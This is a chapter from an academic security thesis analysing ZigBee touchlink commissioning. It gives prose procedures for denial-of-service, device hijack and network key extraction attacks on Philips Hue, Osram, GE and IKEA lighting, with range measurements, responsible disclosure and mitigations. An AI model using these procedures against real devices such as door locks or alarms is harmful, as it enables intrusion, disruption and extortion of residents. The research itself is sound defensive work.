The threat model is determined as follows: The user of the ZigBee network is trusted and honest, and installs the network as required by the manufacturer. The online account credentials for the remote access to the ZigBee network are not disclosed. The nodes of the network are certified by the ZigBee Alliance and follow the protocols described in the ZigBee Light Link or the ZigBee 3.0 specifications. Therefore, all touchlink-enabled ZigBee devices are equipped with the touchlink preconfigured link key. The goal of the attacker is to violate any of the security goals mentioned above. We assume that attackers have neither physical access to the ZigBee devices nor to the local area network (LAN) or wireless LAN (WLAN) to which a ZigBee device might be connected. The only capability of the attacker is to eavesdrop and inject packets in the wireless communication of at least one touchlink-enabled node of the targeted ZigBee network. Thus, the attacker controls an IEEE 802.15.4 radio transceiver, which is present within the wireless range of the targeted node. Note that the radio transceiver can be mounted on a drone such that no close physical proximity of the person that performs the attack is required. This potential scenario was demonstrated in [248].

5.3.2 Threat Scenarios

There exists a wide variety of ZigBee-certified devices in the smart home domain, from sensors like smoke detectors and hygrometers, controllers for building services to appli- ances like washing machines. The ZigBee 3.0 specifications define also function clusters for security-critical applications, such as front door locks, window shade controllers, and intruder alarm systems. Thus, the attack surface, which we evaluate on touchlink-enabled connected lighting systems, potentially affects all future ZigBee-certified products that are compliant to either the ZigBee Light Link or ZigBee 3.0 specifications. Security-critical ZigBee devices can be attacked in two ways: either directly, in case the targeted ZigBee device supports touchlink commissioning, or indirectly, in case there exists at least one touchlink-enabled device in a ZigBee network that contains security-critical devices. In the following, we outline three threat scenarios.

Scenario #1. We assume an application that authorizes door access to a restricted area. The network is organized as centralized security network and communicates based on ZigBee 3.0 standard. One of the nodes of the network is a ZigBee-certified door lock that implements touchlink commissioning. As we show in Section 5.4.3, the attacker can

85 5 Insecurity of ZigBee Touchlink Comissioning reset arbitrary touchlink-enabled nodes to factory-new without knowing any cryptographic secrets. The attacker applies this reset attack to the door lock, which puts the lock in factory-new state and most probably clears the way for the attacker.

Scenario #2. We assume a smart home network comprising various applications in- cluding an intruder alarm system. This network is organized as a ZigBee 3.0 distributed security network. We further assume that an attacker can eavesdrop the touchlink com- missioning procedure of an arbitrary touchlink-enabled device, which is joined to this network, e.g., a new light bulb. From this captured communication, the attacker extracts the network key as described in Section 5.4.4. As a consequence, the attacker can decrypt all further network communication as well as inject commands into the network. Hence, the attacker can reset the intruder alarm system to factory-new through sending spoofed network leave commands, and break into the house without triggering the alarm.

Scenario #3. A household intended for elderly living deploys a distributed security net- work consisting of a large number of touchlink-enabled devices. In Sections 5.4.3 and 5.4.3, we present attacks that allow to permanently disconnect touchlink-enabled devices from their legitimate network and to trigger a manufacturer-specific identify action for a dura- tion up to 18 hours. For example, in case of light bulbs, this action is blinking but for other devices this can also be making sounds or moving. The attack proceeds as follows: first, the attacker permanently disconnects all touchlink-enabled devices, and then makes them blink, beep, or move for several hours. On payment, the attacker promises to stop the attacks and to reconnect the devices to the legitimate network. The residents can decide whether they want to manually reset and recommission each device or to pay the demanded amount of money. Since the recovery of ZigBee devices from the permanent dis- connect attack can be an extremely cumbersome task that requires dexterity and precise timing, as described in Section 5.4.6, residents might prefer to pay the ransom.

5.4 Security Analysis of Touchlink Commissioning

We divide our attacks into two types: passive and active attacks. Passive attacks only eavesdrop on the wireless communication of nodes in the targeted network, while active attacks require the attacker to interact with the targeted node via wireless communication. In addition, we also categorize our attacks according to the goal of the attacker: In the first category, we describe denial-of-service (DoS) attacks that exploit security weaknesses in the concept of so-called inter-PAN frames. These attacks require no knowledge of any cryptographic material. In the second category, we show attacks that allow the attacker to control devices in the network. These attacks require knowledge of the touchlink precon- figured link key that has been leaked in March 2015. In Table 5.1, we provide an overview of all attacks that are described in this section.

86 5.4 Security Analysis of Touchlink Commissioning

Table 5.1: Overview of attacks. Type of Attack Attacker Goals Attack Active Passive DoS Control Identify Action     Reset to Factory-New     Permanent Disconnect     Hijack     Network Key Extraction    

The attacks in this section outline the procedures to compromise a single touchlink-enabled device. All attacks can be easily extended to target multiple devices at the same time by running the attack procedures for different target devices simultaneously.

5.4.1 Penetration Testing Framework Z3sec

For our research, we developed the penetration testing framework Z3sec in Python to evaluate the security of ZigBee 3.0 devices. These tools and their documentation are available as open-source software on GitHub2. The Z3sec framework consists of three major components: First, a touchlink library to build arbitrary touchlink packets and to keep track of source addresses and sequence numbers. Second, a crypto module that provides the functionality to encrypt and decrypt ZigBee packets. This component also handles key transport frames, especially decrypting the encrypted network key, and vice versa. Third, the radio interface module enables the communication between the radio transceivers and the touchlink library. As radio transceiver, we utilize the USRP B200 from Ettus, a software-defined radio covering the radio-frequency range between 70 MHz and 6 GHz. The USRP features an FPGA and connects to a host computer via USB 3.0. We use Scapy-radio [236] as interface to send and receive ZigBee packets with the USRP. Scapy-radio itself uses capabilities of GnuRadio and an IEEE 802.15.4 GnuRadio flow chart implementation [26]. In addition, we implemented a command line tool that performs the attack procedures described in the following sections, and a module that is able to send or spoof control commands to the devices once the network key is disclosed.

5.4.2 Testbed

We analyzed the following four systems: a Philips Hue starter set including one bridge and three white and color ambiance (LCT001) LED bulbs, which is exemplary shown in

2 https://github.com/IoTsec/Z3sec

87 5 Insecurity of ZigBee Touchlink Comissioning

(a) Philips Hue (b) Osram Lightify

(c) GE Link (d) IKEA Trådfri

Figure 5.3: The four evaluated ZigBee-certified connected lighting systems.

Figure 5.3a. Furthermore, we deployed an Osram Lightify gateway with a classic A60 tunable white LED bulb as depicted in Figure 5.3b. Our third system is a GE Link starter pack containing a Link hub and a Link A19 soft white LED light bulbs as shown in Figure 5.3c. The last system is the IKEA Trådfri system consisting of a Trådfri LED 980lm light bulb and a Trådfri remote control as depicted in Figure 5.3d. All these systems implement the ZigBee Light Link standard, for which touchlink commissioning is mandatory. Thus, these systems are representative for arbitrary touchlink-enabled ZigBee devices. Due to the novelty of ZigBee 3.0 specifications, only one manufacturer released ZigBee 3.0-certified products so far to the best of our knowledge (as of March 2017). These released ZigBee 3.0-certified products by Ubisys do not support touchlink commissioning. Nevertheless, the presented attacks apply to all future ZigBee 3.0 products that enable touchlink commissioning. Before starting our evaluation, we updated the Philips Hue firmware to the then-latest version 01031131 as well as the API to version 1.12.0. We updated the Osram Lightify gateway WLAN to version 1.1.2.101 and the gateway ZigBee to version 1.2.0.67. We found no possibility to update the GE Link firmware by using the manufacturer-recommended Wink app. At the time of the evaluation, there existed neither a mobile device app for IKEA Trådfri nor a possibility to update the firmware of the Trådfri bulbs or remote control3. The attacker equipment comprises a laptop on which our penetration testing framework Z3sec is installed. A radio transceiver, the Ettus USRP, is connected to the laptop. We started the evaluation of each attack with the default settings, in which the lighting system works as intended and the system is not compromised.

3 IKEA released a Trådfri gateway and a Trådfri mobile device app in April 2017.

88 5.4 Security Analysis of Touchlink Commissioning

5.4.3 Denial-of-Service Attacks

Our DoS attacks exploit the concept of inter-PAN frames, which are a special type of ZigBee frames that allow the communication between different personal area networks (PANs). In 2008, inter-PAN frames were introduced in the ZigBee Smart Energy appli- cation profile. In the purpose description, the ZigBee Smart Energy standard states that inter-PAN transmissions allow ZigBee devices to ‘perform limited, insecure, and possibly exchange of information’ [328, p.81]. In the context of smart metering, for which the ZigBee Smart Energy standard was intended, the mandate for such a transmis- sion mechanism is the ‘market requirement to send pricing information to very low cost devices’, e.g., refrigerator magnets showing the current energy consumption or prices. The ZigBee Light Link standard adopted the inter-PAN transmission mechanism to enable the commissioning of networks with constraint devices, e.g., remote controls. In the touchlink commissioning procedure, inter-PAN frames are used to transmit touchlink commands and their responses between initiator and target device. Since there exists no shared key material between different PANs, inter-PAN frames are neither secured nor authenticated. Hence, all attacks presented in the section are per- formed without requiring any knowledge of the touchlink preconfigured link key or of any other cryptographic material relating to these devices.

Active Device Scan. The active device scan searches for ZigBee devices in wireless range of the attacker’s equipment. The active device scan is a mandatory step in preparation of any further attack.

Procedure. The attacker builds a scan request, then sends this inter-PAN command frame on all ZigBee channels consecutively and listens a few milliseconds on each channel for scan responses. Through the reception of scan responses, the attacker learns about all ZigBee devices that are also listening on this channel. ZigBee uses 16 channels in the 2.4 GHz ISM band: channel 11 to 26, while channel 1 to 10 are located in other ISM bands. The ZigBee 3.0 specifications define four primary channels on which devices are listening for touchlink scans: 11, 15, 20, and 25. These channels are used for commissioning and normal operations, while all remaining channels can be used as backup.

Evaluation. The active device scan works with all four lighting systems. In general, all light bulbs responded to the scan request, while also the Osram Lightify gateway answers each time. The GE Link hub does not respond to scan requests, and the Philips Hue bridge only replies if the button on the hub was pushed within the last 30 seconds.

ACK Spoofing. All following attacks start with an active device scan and then send further inter-PAN command frames. When target devices in Osram Lightify or GE Link imple- mentations receive a scan request, they answer with the scan response and then wait

89 5 Insecurity of ZigBee Touchlink Comissioning

Figure 5.4: Acknowledgment spoofing: the attacker spoofs a third device to send an ACK to the target device timely. for a MAC-layer acknowledgment (ACK). If they do not receive an ACK within a specified time frame of 864 microseconds, they drop further communication. Z3sec is too slow in sending this ACK since the processing of the received ZigBee frames is not performed on the hardware platform but in software, and therefore delayed for a few milliseconds. However, we can impersonate an existing ZigBee device, referred to as spoofed device in Figure 5.4, by setting the extended source address of the scan request to the extended address of the spoofed device. As a result, the spoofed device sends an ACK upon recep- tion of a scan response, even if this device had never sent any scan request. This is an inherent feature of the IEEE 802.15.4 MAC layer, and we can leverage this mechanism for “providing” ACKs timely. On the contrary, Philips Hue and IKEA Trådfri devices do not require any ACKs to the scan responses, making our attacks easier to implement.

Identify Action Attack. The touchlink commissioning procedure provides the possi- bility to request a ZigBee device to identify itself via a pre-defined identify action, e.g., flashing, dimming, or beeping. Originally, the identify procedure is intended to give the user a possibility to select and identify a certain node, which should be added to the network but the identify action also can be abused by attackers.

Procedure. After an active device scan, the attacker can send an identify request to the targeted ZigBee device. The identify request contains the transaction identifier and identify duration. The identify duration can be at maximum 0xFFFE, which converts to a time duration of 18 hours 12 minutes 14 seconds. If the identify duration is set to 0, a previously started identify procedure is aborted before the specified duration elapsed. Setting the identify duration to 0xFFFF requests the device to perform the identify pro- cedure for a device-specific default period of time, usually a few seconds. At the reception of the identify request, the targeted ZigBee device starts its identify action for the defined period of time.

Evaluation. All lighting systems are vulnerable to the identify action attack. During the blinking of the lights, the users can neither turn off nor control the light bulb using

90 5.4 Security Analysis of Touchlink Commissioning

Table 5.2: Maximum duration of the identify action attack. System Maximum duration Philips Hue 18:12:14h Osram Lightify 9:12:53h GE Link 9:06:31h IKEA Trådfri 0:01:00h the apps provided by the manufacturers. The only way to shut down the lights is to physically disconnect the bulb from the power supply. An exception are IKEA Trådfri bulbs, which dim their lights up and down instead of flashing. Also, the identify action can be immediately aborted by pressing an arbitrary button on the remote control. The attacker can abort the attack anytime by sending another identify request with the field duration set to zero. The maximum duration of blinking that can be triggered with a single identify request is shown in Table 5.2. We assume that the duration depends on the manufacturer’s implementation of touchlink commissioning. After performing the identify action attack, the Philips Hue bulb and the IKEA Trådfri bulb return to the pre-attack state and color, while the Osram Lightify bulb and the GE Link bulb change to the default state and color. This attack also works if the device is turned off but supplied with power.

Reset to Factory-New Attack. In this attack, the attacker resets the configuration of a ZigBee device to the factory-new state.

Procedure. The attack is performed by sending a reset to factory new request inter- PAN command frame after a prior active device scan. The payload of the reset to factory new request only contains the transaction identifier. On the reception of a valid reset to factory new request, the light bulb discards the current configuration. The color and brightness of the light bulb changes to the default states.

Evaluation. Our evaluation showed that all four lighting systems are vulnerable to the reset to factory-new attack. Interestingly, we are also able to reset the Lightify gateway (at any time) as well as the Philips Hue bridge (if the button of the bridge was pushed within the last 30 seconds) to a factory-new state. After a reset to factory-new attack, the legitimate user would have to reintegrate the bulb into the legitimate network by either searching for new devices via the mobile device app or by using a remote control. This operation has to be initiated manually by the user. In the meantime, i.e., before the user initiates a recommissioning, an attacker has the chance to hijack the reset device using the classical commissioning in ZigBee Light Link or EZ-Mode commissioning in ZigBee 3.0, each in combination with the publicly known default global Trust Center link key as demonstrated in [337, 248].

91 5 Insecurity of ZigBee Touchlink Comissioning

Permanent Disconnect Attack. In the permanent disconnect attack, the user loses control over the touchlink-enabled device. This attack differs from the reset to factory-new attack in the process of recovery: after a reset to factory-new attack, the user can simply recommission the attacked bulb to the network again. In the aftermath of a permanent disconnect attack, the user needs to recover the bulb first, as described in Section 5.4.6, before a recommissioning to the legitimate network is possible again.

Procedure. We present two approaches to perform a permanent disconnect attack: In the first approach, we force a targeted ZigBee device to change the current channel to another channel determined by the attacker. In the second approach, we join the targeted device to a non-existent network.

A change of the wireless channel can be enforced by sending a network update request inter-PAN command frame. The command must include a network update identifier that is higher than the current update identifier of the targeted network, which is a counter that is incremented each time the network settings are updated. The current network update identifier can be retrieved from the scan response of the target device. After receiving the network update request, which includes the new channel, the target device switches to this channel. The legitimate network does not recognize the shift. As a consequence, the targeted device does not receive legitimate user commands anymore.

Using a network join end device request inter-PAN command frame (instead of the network update request), an attacker can manipulate additional network settings like the PAN ID and the current network key. The attacker sets the encrypted network key field to an arbitrary 128-bit value and then sends the network join end device request to the targeted ZigBee device. On the reception of a network join end device request, the ZigBee device leaves its current network and sets the internal parameters according to the new configuration. Since the encryption of the network key is not authenticated, the device decrypts the arbitrary 128-bit value to a garbage network key, which also is not known to the attacker. The transaction is confirmed by sending a network join end device response.

Evaluation. In the evaluation, all four presented lighting systems are vulnerable to both permanent disconnect attacks. These attacks do neither change the color nor the state of the bulb but after performing the attack procedures, the targeted bulbs cannot be controlled by the legitimate user anymore.

5.4.4 Attacks to Gain Control

The authenticity and integrity of the ZigBee touchlink commissioning procedure relies on the touchlink preconfigured link key, also denoted as ZLL master key in the ZigBee Light Link specifications, that is used to encrypt the current network key before this key is transmitted to the joining device. The procedure of the network key encryption starts

92 5.4 Security Analysis of Touchlink Commissioning by expanding the transaction identifier and the response identifier from scan request and scan response, respectively, to an 128-bit string. This bit string is the input to the AES encryption function, while the touchlink preconfigured link key is used as encryption key. The resulting output is denoted as transport key. In the next step, the actual network key is encrypted with the transport key using AES encryption again. The touchlink preconfigured link key is distributed to manufacturers of ZigBee-certified products under an NDA. However, in March 2015, the touchlink preconfigured link key was leaked on Twitter4. In the following, we present attack procedures in which the knowledge of the touchlink preconfigured link key is facilitated to take full control over ZigBee networks.

Hijack Attack. The hijack attack extends the permanent disconnect attack described in Section 5.4.3. Instead of sending arbitrary bytes as the encrypted network key, the attacker forces the ZigBee device to use an attacker-chosen network key.

Procedure. Again, the attacker builds the network join end device request inter- PAN command frame as described in Section 5.4.3. The attacker-chosen network key is encrypted using the leaked touchlink preconfigured link key, the transaction identifier from the scan request and the response identifier from the scan response of the tar- geted device. This encrypted network key is included into a network join end device request and sent to the targeted device. On the reception of a network join end device request, the device updates its internal parameters according to the received values and confirms the transaction by sending a network join end device response. The tar- geted device is now commissioned to the network of the attacker, who has full control over this device.

Evaluation. In the evaluation, we were able to force ZigBee devices of all four connected lighting systems to accept an attacker-chosen network key. This attack paves the way to send further application-specific commands to the targeted devices.

Network Key Extraction. An attacker is able to extract the current network key by eavesdropping the scan response and the network join end device request5 of an initial touchlink commissioning. All these command frames must belong to the same transaction, i.e., contain the same transaction identifier.

Procedure. The legitimate user can be motivated to perform a touchlink commissioning procedure as a result of a prior reset to factory-new attack. Then, the user is forced

4 https://twitter.com/mayazigbee 5 Instead of capturing the network join end device request, this attack can also be performed by capturing a network join router request or a network start request.

93 5 Insecurity of ZigBee Touchlink Comissioning to commission the node to the legitimate network again. After eavesdropping on the encrypted network key from the network join end device request, the network key is decrypted using the leaked touchlink preconfigured link key. The response identifier is known from the scan response, while the transaction identifier is included in all packets belonging to the same transaction.

Evaluation. For this attack, the legitimate user of a connected lighting system has to perform the touchlink commissioning procedure. Our investigations conclude that the Philips Hue and the IKEA Trådfri lighting systems can be targeted with this attack since only a few Philips Hue third-party apps as well as the IKEA Trådfri remote control trigger touchlink commissioning. To the best of our knowledge, there exist neither apps nor ZigBee-certified devices by Osram or GE that can initiate the touchlink commissioning procedure. In our evaluation, we showed that all four lighting systems can be controlled once the network key is exposed. We were able to send commands to turn the bulbs on and off and to change the light color of the Philips Hue bulbs to any arbitrary color.

5.4.5 Evaluation of Wireless Range

In the ZigBee specification, the manufacturers are advised to limit the wireless range of touchlink commands such that only ZigBee devices in close proximity are able to per- form the touchlink commissioning procedure. This limitation, denoted as proximity check, should be implemented in a way that the received signal strength of an initiator device must be above a certain threshold. To get a baseline for our attacks, we measured the maximum distance to successfully perform the touchlink commissioning procedure with a Philips Hue bridge since the Osram Lightify gateway and the GE Link hub provide no possibility to trigger the touchlink commissioning procedure. The maximum distances to successfully commission a Hue bulb or a Link bulb to the Hue bridge are 1.8 meters, and 1.6 meters for a Lightify bulb. For IKEA Trådfri, the maximum distance to trigger the touchlink commissioning procedure between the remote control and a bulb are 1.5 meters. Since the touchlink commissioning procedure is intended to require close proximity, we investigated whether the attacks work for longer distances. We set up an outdoor testbed on a sports ground, in which a line-of-sight between the USRP and the attacked bulbs was given. At the USRP, we mounted rod antennas with 8dB gain according to the manufacturer. The setup is shown in Figure 5.5. We decided on an outdoor measurement with line-of-sight between the attack equipment and the target device since it is hard to generalize statements about the wireless range of these attacks through buildings. The propagation of radio waves depends on many vari- ables, e.g., the ground plan (reflections), structure and thickness of walls, wall openings, electrical installations, as well as interference with other deployed wireless networks. Thus,

94 5.4 Security Analysis of Touchlink Commissioning

(a) Evaluated light bulbs. (b) Attacker equipment.

Figure 5.5: Outdoor testbed to measure the maximum distance of successfully attacking a ZigBee-certified device.

Table 5.3: Maximum ranges of an active attack in our evaluation. Active Attack Range System Legitimate Range Regular Disclosed bug Philips Hue 1.8m 36m (patched) Osram Lightify 1.6m 15m >190m GE Link 1.8m 28m >190m IKEA Trådfri 1.5m >190m >190m we conducted outdoor measurements eliminating as many types of distortions as possible and thus providing ‘ground truth’ for further investigations.

Active attacks. In the evaluation of the active attacks, we measured the maximum distance from which we are able to trigger an identify action attack, which is described in Section 5.4.3. The identify action attack requires to pass the proximity check and to receive a response from the targeted node, and therefore, this attack is representative for active attacks. The results are shown in Table 5.3. The maximum distance of successfully attacking the Osram Lightify system is 15 meters, the maximum distance of the GE Link system is 28 meters and the maximum distance of the Philips Hue system is 36 meters. These distances depend on the noise of the channel as well as the orientation of the bulbs and the antennas of the USRP. We experimented with different gain and antenna settings and also with different positions and directions of the bulbs. From our measurement results, we estimate that the received signal strength of inter-PAN command frames has to be stronger than -40dBm. We also measured the maximum distance to perform the same attack on IKEA Trådfri bulbs. In our evaluation, we were able to trigger the identify action attack from a distance

95 5 Insecurity of ZigBee Touchlink Comissioning of more than 190 meters. This was the maximum measurable distance due to space restrictions of the outdoor testbed. Since the range to actively attack an IKEA Trådfri bulb is much larger compared to the other systems, we assume that the proximity check is not enforced. For all these tests, the transaction identifier was chosen randomly. Previous work [248] disclosed a bug in the ZigBee Light Link implementation of Philips Hue, in which the proximity check can be circumvented by setting the transaction identifier of the touchlink command to zero. This bug was patched by Philips in October 2016. In our evaluation, we confirmed that the same bug also affects Osram Lightify, GE Link, and IKEA Trådfri. We were able to trigger the identify action attack from the maximal measurable distance of 190 meters for each of these systems. Again, we assume that this distance can be enlarged.

Passive attacks. We also evaluated the ranges of passively eavesdropping on the touch- link commissioning procedure to extract the current network key. We were able to extract the network key, that was established using an IKEA Trådfri system consisting of a bulb and a remote control, from a distance of 42 meters. In addition, we extracted the network key, established between a Philips Hue bridge and a Philips Hue bulb, from a distance of 130 meters. We did not evaluate Osram Lightify as well as GE Link systems since they do not provide an interface for consumers to trigger the touchlink commissioning procedure.

5.4.6 Recovery

The recovery from an identify action attack or a reset to factory-new attack is easy to accomplish: for the identify action attack, the user has to disconnect the node from the power source and reconnect again. For the reset to factory-new attack, the user needs to rejoin the node to the network. To recover from permanent disconnect and hijack attacks, which altered the configuration of the nodes, is more challenging but all evaluated lighting systems possess functions to regain control over the attacked devices. However, these procedures are not obvious at first sight. In any case, a recovery entails manual effort for the user, as we explain below. For GE Link, Osram Lightify, and IKEA Trådfri, the only way to recover the attacked bulbs is a physical reset. The physical reset is not specified in the ZigBee Light Link standard6, but can be achieved by powering the bulbs on and off in a certain manufacturer-specific pattern, e.g., an Osram Lightify A60 bulb must be turned on 3 seconds, off 5 seconds, and this procedure must be repeated five times. This is a cumbersome task and might not be successful at the first try. Since the physical reset mechanisms are not obvious, either a mobile device app (GE Link, Osram Lightify) or a manual (IKEA Trådfri) guides the process of performing a physical reset. The Philips Hue system lacks a physical reset, to

6 The ZigBee 3.0 specifications recommend supporting a reset via local action in a manufacturer-specific fashion.

96 5.5 Disclosure and Response the best of our knowledge. However, the Hue system supports an additional commissioning mechanism manual search, which is not specified in any ZigBee standard. Manual search works by entering a code that is printed on a bulb into the Hue app. The manual search fails if the channel of the attacked device was altered to a secondary channel. Touchlink commissioning can be applied as an alternative recovery procedure for Philips Hue and IKEA Trådfri bulbs. However, the IKEA Trådfri remote control does not search on secondary channels, therefore, if the channel of a bulb was changed to a secondary channel, it must be reset before recommissioning. In Philips Hue, touchlink commission- ing can be performed by using either the Hue API debug tool or a third-party app. After the recommissioning with touchlink, an interesting effect can be observed: Instead of rein- tegrating the attacked bulb into the former network, the Philips Hue bridge detects that the network update identifier of the discovered device is higher than its own. The Hue bridge adapts to the ‘latest’ network settings and switches to the attacker-defined channel. Consequently, the bridge loses the connection to all other bulbs, which remain on the for- mer channel. Afterwards, all other bulbs of the former network have to be recommissioned to the new network using touchlink. This is a time-consuming task because all devices have to be moved in close proximity (1-2 meters) to the Hue bridge in order to perform the touchlink commissioning.

5.5 Disclosure and Response

We reported the results of this security analysis to GE, IKEA, Philips, Osram, and the ZigBee Alliance. The manufacturers IKEA, Philips and Osram responded to our outreach. In contrast, the GE Product Security Incident Response Team confirmed the reception of our notification but did not comment on our report. Osram discussed with us strategies of mitigating the reported weaknesses. A firmware update, which was rolled out in July 2017, patched the bug in the proximity check and put touchlink commissioning under application control. This way, touchlink commissioning is only activated in new Lightify products if the user turns the device on and off in specific pattern. Also in response to our report, IKEA was cooperating with its stack vendor to deliver a patch (as of July 2017). We discussed the results of our security analysis with representatives and members of the ZigBee Alliance and received their feedback that the analysis is accurate and complete. According to the ZigBee Alliance, the main reason for development of touchlink was to reduce the complexity of commissioning procedure for ZigBee Pro devices. Touchlink offered a low entry level for the consumers to set up connected lighting systems that are configured via remote controls. However, at the same time as the ZigBee Light Link standard was developed (2010–2012), the popularity of smartphones increased rapidly. Because of this development, the ZigBee Alliance decided to introduce a bridge device that translates TCP/IP traffic sent by smartphones into ZigBee commands, thus simplifying

97 5 Insecurity of ZigBee Touchlink Comissioning the handling of the classical ZigBee commissioning procedure and providing an alternative method to overcome the complexity of commissioning.

5.6 Discussion

Summarizing the results of the security analysis, we can see that all tested ZigBee-certified products are insecure against passive and active attacks. An attacker is able to thwart the availability and can take complete control over any touchlink-enabled device. It is irrelevant whether the targeted ZigBee networks was set up using the touchlink or another commissioning procedure. Furthermore, we showed that close proximity is not required. In our evaluation, we successfully performed active attacks from a distance between 15 and 190 meters depending on the targeted product. Also, we were able to passively eaves- drop the touchlink commissioning procedure from distances between 42 and 130 meters. We assume that these distances could be further extended if the attacker uses directional antennas. We tested four different ZigBee-certified connected lighting systems that fa- cilitate the ZigBee Light Link standard. Since the touchlink commissioning procedure in ZigBee 3.0 has not been changed compared to ZigBee Light Link, all presented attacks also apply to arbitrary ZigBee 3.0 products that enable touchlink commissioning. In summary, we state that all three threat scenarios outlined in Section 5.3.2 are realistic and exploit security weaknesses that exist by design. In addition, we explored that the recovery of attacked devices is quite a cumbersome task.

Usage of touchlink. Since touchlink commissioning is an optional feature in ZigBee 3.0, we recommend disabling this commissioning option in all future ZigBee products. Already a single touchlink-enabled device in the network can expose the network key and thus lead to insecurities of other nodes. In our communication with the ZigBee Alliance, they suggested to put the enabling of the touchlink features under application control, for example to enable touchlink only a few minutes after power-up. Although this restriction limits the vulnerability time frame, the users can be motivated by social engineering techniques to power up devices at predictable times. For example, jamming of ZigBee communication may motivate the consumers to disconnect a device from the power source and power it up again. Furthermore, the recommendation of putting touchlink commissioning under application control is not included in the specifications and so, it is not quite clear how the manufacturers should become aware of this.

Manufacturer-specific mitigation. No immediate mitigation of the attacks, presented in Section 5.4, is possible since the security weaknesses result from legitimate features in the specification, especially from the concept of unauthenticated inter-PAN frames. If touchlink commissioning is required, manufacturer-specific changes can be made to contain the effects of the attacks. For example, the identify action should be limited to a reasonable duration (like in the IKEA Trådfri implementation), which would decrease the impact of the identify action attack significantly.

98 5.6 Discussion

Renewal of the touchlink preconfigured link key. Since the touchlink preconfigured link key was leaked in March 2015, the touchlink commissioning procedure is considered compro- mised. On the one hand, the replacement of the touchlink preconfigured link key would circumvent the attacks presented in Section 5.4.4, and therefore protect against take-over attacks, in which the attacker gains control over the targeted devices. On the other hand, the renewal of this key would render the integration of ZigBee Light Link-based connected lighting systems and complementary equipment into ZigBee 3.0 networks impossible. This would most likely lead to public resentment, as the following incident illustrates. In De- cember 2015, an update of the Hue app by Philips locked out light bulbs of other vendors if these vendors did not participate in the ‘Friends of Hue’ certification program. The public outcry made Philips revert this decision after a few days through providing a non- scheduled update [235]. In addition to compatibility problems, the non-disclosure of a renewed key cannot be guaranteed since the current touchlink preconfigured link key was also protected by an NDA but leaked anyway.

EZ-Mode Commissioning. EZ-Mode commissioning is an alternative commissioning pro- cedure supported by all ZigBee 3.0 products. This commissioning procedure neither relies on inter-PAN frames nor a proximity check. Therefore, the attack procedures described in Section 5.4 cannot be adapted. EZ-Mode commissioning offers three options of securing the network key transport. In centralized security networks, the network key transport can be either protected by the publicly known default global Trust Center link key, or a link key derived from an install code. In distributed security networks, the network key transport is encrypted using the NDA-protected distributed security global link key. All three EZ-Mode commissioning options have serious drawbacks in terms of security and usability. Using the default global Trust Center link key makes the networks susceptible to attack scenarios where users are forced (e.g., by jamming) to recommission a node to the network in presence of the attacker. In this case the attacker would be able to recover the network key through eavesdropping on the commissioning procedure. Using the NDA- protected distributed security global link key is only secure as long as the key is not leaked. Thus, in the long run, the install code option is the only EZ-Mode commissioning option that is secure against the local attacker model described in Section 5.3.2. We note, however, that this option requires an extra effort from the users in terms of scanning (or entering) the install code using a mobile device app. This might constitute a serious usability problem, especially if already installed devices have to be recommissioned. For example, this can happen if a broken coordinator node has to be replaced. If the devices are difficult to reach, e.g., bulbs installed on the ceiling, the recommissioning might become quite cumbersome.

Limitations of our work. The ZigBee 3.0 specifications [330, p. 64] warn about supporting the touchlink command to join an end device to an existing centralized security network, which means that the hijack attack and network key extraction possibly cannot be per- formed on centralized security networks, if manufacturers heed this warning. However,

99 5 Insecurity of ZigBee Touchlink Comissioning these attacks work for distributed security networks. All other attacks work for both security network models.

5.7 Related Work on ZigBee Security

The security of the ZigBee standard as well as the underlying IEEE 802.15.4 standard attracted much less attention in the academic research community compared to other wireless standards, such as Wi-Fi, Bluetooth or mobile telephony. Sastry and Wagner [258] analyzed the security mechanisms of the IEEE 802.15.4 protocol. However, these mechanisms are not used in ZigBee. Wright [315] published the penetration testing tool KillerBee, which allows to sniff and analyze traffic of ZigBee and other IEEE 802.15.4-based networks. Wright also exposed that the network key of the then-current ZigBee standard was sent in clear text over the air. He demonstrated successful replay attacks using previously captured ZigBee traffic. The ZigBee Pro specification, released in 2012, addressed these security weaknesses. Goodspeed et al. [108] developed exploration tools to analyze the wireless attack surface of IEEE 802.15.4 networks. Armknecht et al. [14] present a formal security model for the ZigBee touchlink commissioning. Further papers [224, 301] cover security issues of ZigBee networks but these papers refer to security weaknesses concerning outdated ZigBee specifications and have not been evaluated with ZigBee-certified products. Since the emergence of connected lighting systems in 2012, these systems have been subject to a number of security investigations. Dhanjani [63] published implementation weaknesses of the command authentication in the Philips Hue lighting system. He discovered that the secret whitelist token, which is required to authenticate the commands sent from the app (or website) to the bridge, is a hash of the MAC address of the controlling device. Chapman [43] obtained the firmware of LIFX light bulbs via a JTAG debugger and extracted cryptographic key material through reverse engineering of the firmware. Heiland [122] exposed vulnerabilities in the Osram Lightify system. Through reverse- engineering, he discovered that Wi-Fi credentials are stored in plaintext in the iOS Lightify Home app. Zillner et al. [337] exposed security weaknesses in the ZigBee Pro specification. They showed that ZigBee-based lighting systems use publicly known fallback keys in the classical commissioning procedure for the initial key exchange, which allows the extraction of the network key. Ronen and Shamir [249] used the Philips Lux lighting system, which is the white-color variant of Hue, to build a covert channel for the exfiltration of data from an isolated environment. Also, Ronen et al. [248] exploited an implementation bug in Philips Hue bulbs that allowed to reset and to control these bulbs from a distance of a few hundred meters. In addition, they extracted cryptographic material, which secured the update process of the bulb’s firmware, from the hardware using correlation power analysis. As a result, Ronen et al. were able to install a manipulated firmware image on Hue bulbs, and discussed the threat of a self-spreading IoT worm. In contrast to related work on connected lighting systems, we do not analyze the products

100 5.8 Conclusion of a certain manufacturer but investigate the underlying standard. Also, we are the first to investigate the security mechanisms of the latest ZigBee standard, ZigBee 3.0.

5.8 Conclusion

Millions of IoT devices, including security-critical products that should be secured against local attackers, such as door locks and intruder alarm systems, use ZigBee for wireless low-power communication. In this chapter, we investigated the touchlink commissioning procedure, which is a commissioning option in the latest ZigBee specifications, ZigBee 3.0. We performed a security analysis of the touchlink commissioning procedure, in which we described active and passive attacks and evaluated their impact using our penetration testing framework Z3sec. Our results conclude that attackers can thwart the availability of touchlink-enabled devices and can gain control over all nodes in the network. Already a single touchlink-enabled ZigBee device is able to expose the network key to an attacker, and therefore is sufficient to compromise the security of all nodes in the network, no matter how these nodes were added to the network. Thus, we warn about the adoption of touchlink commissioning in all future ZigBee 3.0 devices. To prevent these attacks, we recommend manufacturers of ZigBee-certified products to use EZ-Mode commissioning in combination with install codes.

101

Part II

Economic Perspective

Chapter 6

Root Cause Analysis of ZigBee’s Insecurity

